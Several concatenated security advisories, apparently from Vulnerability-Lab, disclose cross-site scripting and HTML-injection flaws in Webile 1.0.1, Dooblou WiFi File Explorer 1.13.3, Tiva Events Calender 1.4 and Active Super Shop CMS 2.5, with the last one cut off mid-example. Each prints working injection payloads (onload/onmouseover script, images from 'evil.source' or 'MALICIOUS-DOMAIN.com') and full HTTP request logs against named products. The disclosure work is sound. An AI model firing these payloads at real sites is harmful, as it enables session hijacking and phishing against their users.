Technique:=======================RemoteSeverity Level:===============MediumAuthentication Type:====================Restricted Authentication (Guest Privileges)User Interaction:=================Low User InteractionDisclosure Type:================Independent Security ResearchTechnical Details & Description:================================Multiple persistent input validation web vulnerabilities has been discoveredin the Webile v1.0.1 Wifi mobile android web application.The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser toweb-application requests from the application-side.The persistent input validation web vulnerabilities are located in the send and add function. Remote attackers are able to inject own maliciousscript codes to the new_file_name and i parameter post method request to provoke a persistent execution of the malformed content.Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicioussource and persistent manipulation of affected application modules.Request Method(s):[+] POSTVulnerable Parameter(s):[+] new_file_name[+] iProof of Concept (PoC):=======================The persistent input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction.For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.Vulnerable Source: SendSend message to phone listing<div class="layui-colla-item"><div class="layui-card-header">Message</div><div class="layui-colla-content" style="display:block;padding-left:16px;"><div class="layui-form-item layui-form-text" id="showMsg"><div><font color="blue">20:10:11</font><a href="javascript:;"  title="Copy" onclick="copy(1658081411827)"><i class="iconfont">&nbsp;&nbsp;</i></a><br><span id="c_1658081411827">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span><br><br></div></div></div></div>history logs messages<table class="layui-table layui-form"><thead><tr><th style="text-align: center;vertical-align: middle!important;border-left-width:1px;border-right-width:1px;height:32px;" width="2%" align="center"><input type="checkbox" lay-filter="checkall" name="" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div></th><th style="border-right-width:1px;">Message</th><th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="15%">Date</th><th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="3%" valign="center">Action</th></tr></thead><tbody><tr><td style="text-align: center;vertical-align: middle!important;border-left-width:1px;min-height:180px;" align="center"><input type="checkbox" name="id" value="3" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div></td><td style="height:32px;"> <span id="c_3">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span></td><td align="center">2022/07/17 20:10</td><td class="td-manage" style="border-right-width:1px;text-align:center;"><a title="Copy" onclick="copy(3)" href="javascript:;"><i class="iconfont">&nbsp;&nbsp;</i></a><a title="Delete" onclick="deleteLog(this,3)" href="javascript:;"><i class="layui-icon">&nbsp;&nbsp;</i></a></td></tr></tbody></table>--- PoC Session Logs #1 (POST) ---  (Add)http://localhost:8080/file_actionHost: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 210Origin:http://localhost:8080Connection: keep-aliveReferer:http://localhost:8080/webile_filesCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6i={"action":"create","file_path":"/storage/emulated/0","new_file_name":"pwnd23>"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}-POST: HTTP/1.1 200 OKContent-Type: application/jsonConnection: keep-aliveContent-Encoding: gzipTransfer-Encoding: chunked-http://localhost:8080/evil.sourceHost: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveReferer:http://localhost:8080/webile_filesCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6Upgrade-Insecure-Requests: 1-GET: HTTP/1.1 200 OKContent-Type: application/octet-streamConnection: keep-aliveContent-Length: 0-Cookie:treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6--- PoC Session Logs #2 (POST) ---  (Send)http://localhost:8080/sendHost: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 180Origin:http://localhost:8080Connection: keep-aliveReferer:http://localhost:8080/webile_sendCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6i={"os":"Windows Windows 10","b":"firefox 102.0","c":">"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}-POST: HTTP/1.1 200 OKContent-Type: application/jsonConnection: keep-aliveContent-Encoding: gzipTransfer-Encoding: chunked-http://localhost:8080/evil.sourceHost: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveReferer:http://localhost:8080/webile_sendCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6Upgrade-Insecure-Requests: 1-GET: HTTP/1.1 200 OKContent-Type: application/octet-streamDate: Sun, 17 Jul 2022 18:08:33 GMTConnection: keep-aliveContent-Length: 0Security Risk:==============The security risk of the persistent web vulnerabilities in the mobile web application is estimated as medium.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Webile 1.0.1 Cross Site Scripting

Dooblou WiFi File Explorer version 1.13.3 suffers from multiple cross site scripting vulnerabilities.

    Document Title:===============Dooblou WiFi File Explorer 1.13.3 - Multiple VulnerabilitiesReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2317Release Date:=============2023-07-04Vulnerability Laboratory ID (VL-ID):====================================2317Common Vulnerability Scoring System:====================================5.1Vulnerability Class:====================MultipleCurrent Estimated Price:========================500€ - 1.000€Product & Service Introduction:===============================Browse, download and stream individual files that are on your Android device, using a web browser via a WiFi connection.No more taking your phone apart to get the SD card out or grabbing your cable to access your camera pictures and copy across your favourite MP3s.(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.dooblou.WiFiFileExplorer  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered multiple web vulnerabilities in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application.Affected Product(s):====================Product Owner: dooblouProduct: Dooblou WiFi File Explorer v1.13.3 - (Android) (Framework) (Wifi) (Web-Application)Vulnerability Disclosure Timeline:==================================2022-01-19: Researcher Notification & Coordination (Security Researcher)2022-01-20: Vendor Notification (Security Department)2022-**-**: Vendor Response/Feedback (Security Department)2022-**-**: Vendor Fix/Patch (Service Developer Team)2022-**-**: Security Acknowledgements (Security Department)2023-07-04: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============MediumAuthentication Type:====================Restricted Authentication (Guest Privileges)User Interaction:=================Low User InteractionDisclosure Type:================Independent Security ResearchTechnical Details & Description:================================Multiple input validation web vulnerabilities has been discovered in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application.The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser to web-applicationrequests from the application-side.The vulnerabilities are located in the `search`, `order`, `download`, `mode` parameters. The requested content via get method request is insecure validatedand executes malicious script codes. The attack vector is non-persistent and the rquest method to inject is get. Attacker do not need to be authorized toperform an attack to execute malicious script codes. The links can be included as malformed upload for example to provoke an execute bby a view of thefront- & backend of the wifi explorer.Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicioussource and non-persistent manipulation of affected application modules.Proof of Concept (PoC):=======================The input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction.For security demonstration or to reproduce the web vulnerabilities follow the provided information and steps below to continue.PoC: Exploitationhttp://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source"  onmouseover=alert(document.domain)><br>PLEASE CLICK PATH TO RETURN INDEX</a>http://localhost:8000/storage/emulated/0/Download/?mode=31&search=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert%28document.domain%29%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX%3C%2Fa%3E&x=3&y=3http://localhost:8000/storage/emulated/0/Download/?mode=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3http://localhost:8000/storage/emulated/?order=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEXVulnerable Sources: Execution Points<table width="100%" cellspacing="0" cellpadding="16" border="0"><tbody><tr><tdstyle="vertical-align:top;"><table style="background-color: #FFA81E;background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png);background-repeat: repeat-x; background-position:top;" width="700"cellspacing="3" cellpadding="5" border="0"><tbody><tr><td><center><spanclass="doob_large_text">ERROR</span></center></td></tr></tbody></table><br><table style="background-color: #B2B2B2; background-image:url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" width="700" cellspacing="3" cellpadding="5" border="0"><tbody><tr><td><span class="doob_medium_text">Cannot find file ordirectory! /storage/emulated/0/Download/<a href="https://evil.source"  onmouseover="alert(document.domain)"><br>PLEASE CLICK USER PATH TO RETURNINDEX</a></span></td></tr></tbody></table><br><span class="doob_medium_text"><span class="doob_link">&nbsp;&nbsp;<ahref="/">>>&nbsp;Back ToFiles&nbsp;>></a></span></span><br></td></tr></tbody></table><br>-<li></li></ul></span></span></td></tr></tbody></table></div><div class="body row scroll-x scroll-y"><table width="100%" cellspacing="0" cellpadding="6" border="0"><tbody><tr><td style="vertical-align:top;" width="100%"><form name="multiSelect" style="margin: 0px; padding: 0px;" action="/storage/emulated/0/Download/" enctype="multipart/form-data" method="POST"><input type="hidden" name="fileNames" value=""><table width="100%" cellspacing="0" cellpadding="1" border="0" bgcolor="#000000"><tbody><tr><td><table width="100%" cellspacing="2" cellpadding="3" border="0" bgcolor="#FFFFFF"><tbody><tr style="background-color: #FFA81E; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png);background-repeat: repeat-x; background-position:top;" height="30"><td colspan="5"><table width="100%" cellspacing="0" cellpadding="0" border="0"><tbody><tr><td style="white-space:nowrap;vertical-align:middle"><span class="doob_small_text_bold">&nbsp;</span></td><td style="white-space: nowrap;vertical-align:middle" align="right"><span class="doob_small_text_bold">&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=23&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img" title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=24&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=38&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN I-<td style="white-space: nowrap;vertical-align:middle"><input value="" type="checkbox" name="selectAll" onclick="setCheckAll();">&nbsp;&nbsp;<a class="doob_button"href="javascript:setMultiSelect('/storage/emulated/', 'action', '18&order=>" <<="">>"<a href="https://evil.source"  onmouseover=alert(document.domain)">');javascript:document.multiSelect.submit();"style="">Download</a>&nbsp;<a class="doob_button" href="javascript:setMultiSelectConfirm('Are  you sure you want to delete? This cannot be undone!', '/storage/emulated/', 'action','13&order=>"<<><a href="https://evil.source"  onmouseover=alert(document.domain)>');javascript:document.multiSelect.submit();" style="">Delete</a>&nbsp;<a class="doob_button" href='javascript:setMultiSelectPromptQuery("Create Copy","/storage/emulated/", "/storage/emulated/", "action", "35&order=>"<<<a href="https://evil.source"  onmouseover=alert(document.domain)>", "name");javascript:document.multiSelect.submit();'style="">Create Copy</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Zip</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Unzip</a></td><td align="right" style="white-space: nowrap;vertical-align:middle"><span class="doob_small_text_bold">&nbsp;&nbsp;&nbsp;&nbsp;<a href="javascript:showTreeview()"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_tree_dark.png" alt="img" title="Show Treeview"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=23&order=>"<<><a href="https://evil.source"  onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img"title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=24&order=>"<<><a href="https://evil.source"  onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style:none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=38&order=>"<<><a href="https://evil.source"  onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_grid.png" alt="img"title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;</span></td></tr></table>---PoC Session Logs ---http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source"  onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xmlHost: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: */*Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveReferer:http://localhost:8000/storage/emulated/0/Download/%3Ca%20href=%22https://evil.source%22%20onmouseover=alert(document.domain)%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3EGET: HTTP/1.1 200 OKCache-Control: no-cacheContent-Type: text/xml-http://localhost:8000/storage/emulated/0/Download/?mode=<a+href%3D"https%3A%2F%2Fevil.source"+onmouseover%3Dalert(document.domain)><br>PLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3Host: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveCookie: treeview=0Upgrade-Insecure-Requests: 1GET: HTTP/1.1 200 OKCache-Control: no-store, no-cache, must-revalidateContent-Type: text/html-http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source"  onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xmlHost: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: */*Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveReferer:http://localhost:8000/storage/emulated/0/Download/%<a href="https://evil.source"  onmouseover=alert(document.domain)>%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3EGET: HTTP/1.1 200 OKCache-Control: no-cacheContent-Type: text/xmlSecurity Risk:==============The security risk of the multiple web vulnerabilities in the ios mobile wifi web-application are estimated as medium.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Dooblou WiFi File Explorer 1.13.3 Cross Site Scripting

Tiva Events Calender version 1.4 suffers from a persistent cross site scripting vulnerability.

Document Title:  
===============  
Tiva Events Calender v1.4 - Cross Site Scripting Vulnerability

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2276

Release Date:  
=============  
2023-07-05

Vulnerability Laboratory ID (VL-ID):  
====================================  
2276

Common Vulnerability Scoring System:  
====================================  
5

Vulnerability Class:  
====================  
Cross Site Scripting - Persistent

Current Estimated Price:  
========================  
500€ - 1.000€

Product & Service Introduction:  
===============================  
Events Calendar For PHP is a powerful PHP calendar script that can be easily integrated and used with various PHP projects,  
such as scheduler, event handler, etc. The calendar is simple to install, deploy, and use. It is suitable for all types of  
service businesses to get online reservations without any hassles.

(Copy of the Homepage:https://codecanyon.net/item/tiva-events-calendar-for-php/19199337  )

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered a persistent script code inject vulnerability in the Tiva Events Calender v1.4 web-application.

Affected Product(s):  
====================  
tiva_theme  
Product: Tiva Events Calender - Calender PHP (Web-Application)

Vulnerability Disclosure Timeline:  
==================================  
2021-04-03: Researcher Notification & Coordination (Security Researcher)  
2021-04-04: Vendor Notification 1 (Security Department)  
2021-06-24: Vendor Notification 2 (Security Department)  
2021-07-13: Vendor Notification 3 (Security Department)  
****-**-**: Vendor Response/Feedback (Security Department)  
****-**-**: Vendor Fix/Patch (Service Developer Team)  
****-**-**: Security Acknowledgements (Security Department)  
2023-07-05: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Remote

Severity Level:  
===============  
Medium

Authentication Type:  
====================  
Restricted Authentication (User Privileges)

User Interaction:  
=================  
Low User Interaction

Disclosure Type:  
================  
Responsible Disclosure

Technical Details & Description:  
================================  
A persistent input validation web vulnerability has been discovered in the official Tiva Events Calender v1.4 web-application.  
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser  
to web-application requests from the application-side.

The vulnerability is located in the name input field and name parameter. Remote attackers privileged user accounts are able to inject  
own malicious script codes as name. Thus results in a persistent execute of the script code in the backend on edit but as well in the  
frontend (index) were the event is being displayed after the submit (save) via post method request. In the same direction it is possible  
to inject malformed client-side executable script code in get request to trigger a non-persistent execution.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects  
to malicious source and persistent manipulation of affected frontend / backend application modules.

Request Method(s):  
[+] POST / GET

Vulnerable Input(s):  
[+] Name

Vulnerable Parameter(s):  
[+] name

Affected Module(s):  
[+] index.php (Frontend on Event Preview)  
[+] edit.php (Backend on Edit ID)

Proof of Concept (PoC):  
=======================  
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction.  
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.

Exploitation: Payload  
%20"<img src="evil.source" onload=alert(document.domain)>

Vulnerable Source: Frontend (Index)  
<tr><td class="calendar-day-normal"><span class="calendar-day-weekend">8</span></td>  
<td class="calendar-day-normal"><div class="calendar-day-file">9<div class="calendar-file-name color-4" onclick="downloadFile(220)">  
<span class="event-name">event1"%20"<img src="evil.source" onload=alert(document.domain)></span></div></div></td><td class="calendar-day-normal">10</td>  
<td class="calendar-day-normal">11</td><td class="calendar-day-normal">12</td><td class="calendar-day-normal">13</td>  
<td class="calendar-day-normal"><span class="calendar-day-weekend">14</span></td></tr>

Vulnerable Source: Backend (Edit ID)  
<section class="panel">  
<header class="panel-heading"><i class="fa fa-folder-open"></i> Edit File</header>  
<div class="panel-body">  
<div class="alert alert-success">  
<button data-dismiss="alert" class="close close-sm" type="button">  
<i class="fa fa-times"></i>  
</button>Report successfully saved.</div>    
<form class="form-horizontal" action="edit.php?id=220" method="post" enctype="multipart/form-data">  
<div class="form-group">  
<label class="col-lg-2 col-sm-2 control-label">Name<span class="star">&nbsp;*</span></label>  
<div class="col-sm-8">  
<input type="text" name="name" class="form-control" value="event1"%20"<img src="evil.source" onload=alert(document.domain)>" required />  
</div></div>

--- PoC Session Logs (POST) ---  
https://tiva-cal.localhost:8080/admin/report/edit.php  
Host: tiva-cal.localhost:8080  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Content-Type: multipart/form-data; boundary=---------------------------249785717017581481612148649683  
Content-Length: 745  
Origin:https://tiva-cal.localhost:8080  
Connection: keep-alive  
Referer:https://tiva-cal.localhost:8080/admin/report/edit.php  
Cookie: PHPSESSID=76gqk14e1s6cce40hfj11  
name="%20%20"<img src="evil.source" onload=alert(document.domain)>&type=1&time=20-08-2021&file=temp.txt&save=  
-  
POST: HTTP/2.0 200 OK  
server: nginx  
content-type: text/html  
content-length: 1283  
etag: "503-53ed12f4ca761"  
accept-ranges: bytes  
strict-transport-security: max-age=15768000; includeSubDomains  
-  
https://tiva-cal.localhost:8080/admin/report/evil.source  
Host: tiva-cal.localhost:8080  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: image/webp,*/*  
Connection: keep-alive  
Referer:https://tiva-cal.localhost:8080/admin/report/edit.php?id=222  
Cookie: PHPSESSID=76gqk14e1s6cce40hfj11  
-  
GET: HTTP/2.0 200 OK  
server: nginx  
content-type: text/html  
content-length: 1283  
etag: "503-53ed12f4ca761"  
accept-ranges: bytes  
strict-transport-security: max-age=15768000; includeSubDomains

Solution - Fix & Patch:  
=======================  
The vulnerability can be patched by the following steps ...  
1. Encode and escape the name input field content on transmit via post method  
2. Restrict the input field and disallow insert of special chars  
3. Parse the output location on the index frontend via encode to sanitize and prevent the execute  
4. Parse the output location on the edit id report backend via encode to sanitize and prevent the execute

Security Risk:  
==============  
The security risk of the persistent input validation vulnerability in the web-application is estimated as medium.

Credits & Authors:  
==================  
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com    www.vuln-lab.com        www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Tiva Events Calender 1.4 Cross Site Scripting

Active Super Shop CMS version 2.5 suffers from an html injection vulnerability.

Document Title:  
===============  
Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2278

Release Date:  
=============  
2023-07-04

Vulnerability Laboratory ID (VL-ID):  
====================================  
2278

Common Vulnerability Scoring System:  
====================================  
5.4

Vulnerability Class:  
====================  
Script Code Injection

Current Estimated Price:  
========================  
500€ - 1.000€

Product & Service Introduction:  
===============================  
https://codecanyon.net/item/active-super-shop-multivendor-cms/12124432

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered multiple html injection vulnerabilities in the Active Super Shop Multi-vendor CMS v2.5 web-application.

Affected Product(s):  
====================  
ActiveITzone  
Product: Active Super Shop CMS v2.5 (CMS) (Web-Application)

Vulnerability Disclosure Timeline:  
==================================  
2021-08-20: Researcher Notification & Coordination (Security Researcher)  
2021-08-21: Vendor Notification (Security Department)  
2021-**-**: Vendor Response/Feedback (Security Department)  
2021-**-**: Vendor Fix/Patch (Service Developer Team)  
2021-**-**: Security Acknowledgements (Security Department)  
2023-07-05: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Remote

Severity Level:  
===============  
Medium

Authentication Type:  
====================  
Restricted Authentication (User Privileges)

User Interaction:  
=================  
Low User Interaction

Disclosure Type:  
================  
Responsible Disclosure

Technical Details & Description:  
================================  
Multiple html injection web vulnerabilities has been discovered in the official Active Super Shop Multi-vendor CMS v2.5 web-application.  
The web vulnerability allows remote attackers to inject own html codes with persistent vector to manipulate application content.

The persistent html injection web vulnerabilities are located in the name, phone and address parameters of the manage profile and products branding module.  
Remote attackers with privileged accountant access are able to inject own malicious script code in the name parameter to provoke a persistent execution on  
profile view or products preview listing. There are 3 different privileges that are allowed to access the backend like the accountant (low privileges), the  
manager (medium privileges) or the admin (high privileges). Accountants are able to attack the higher privileged access roles of admins and manager on preview  
of the elements in the backend to compromise the application. The request method to inject is post and the attack vector is persistent located on the application-side.

Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and  
persistent manipulation of affected application modules.

Request Method(s):  
[+] POST

Vulnerable Module(s):  
[+] Manage Details

Vulnerable Parameter(s):  
[+] name  
[+] phone  
[+] address

Affected Module(s):  
[+] manage profile  
[+] products branding

Proof of Concept (PoC):  
=======================  
The html injection web vulnerabilities can be exploited by remote attackers with privileged accountant access and with low user interaction.  
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.

Exploitation: Payload  
<img src="https://[DOMAIN]/[PATH]/[PICTURE].*">

Vulnerable Source: manage_admin & branding  
<div class="tab-pane fade active in" id="" style="border:1px solid #ebebeb; border-radius:4px;">  
<div class="panel-heading">  
<h3 class="panel-title">Manage Details</h3>  
</div>  
<form action="https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/"  class="form-horizontal" method="post" accept-charset="utf-8">  
<div class="panel-body">  
<div class="form-group">  
<label class="col-sm-3 control-label" for="demo-hor-1">Name</label>  
<div class="col-sm-6">  
<input type="text" name="name" value="Mr. Accountant"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-1" class="form-control required">  
</div></div>  
<div class="form-group">  
<label class="col-sm-3 control-label" for="demo-hor-2">Email</label>  
<div class="col-sm-6">  
<input type="email" name="email" value="accountant@shop.com"  id="demo-hor-2" class="form-control required">  
</div></div>  
<div class="form-group">  
<label class="col-sm-3 control-label" for="demo-hor-3">  
Phone</label>  
<div class="col-sm-6">  
<input type="text" name="phone" value="017"><img src="https://MALICIOUS-DOMAIN.com/gfx/logo-header.png">" id="demo-hor-3" class="form-control">  
</div></div>

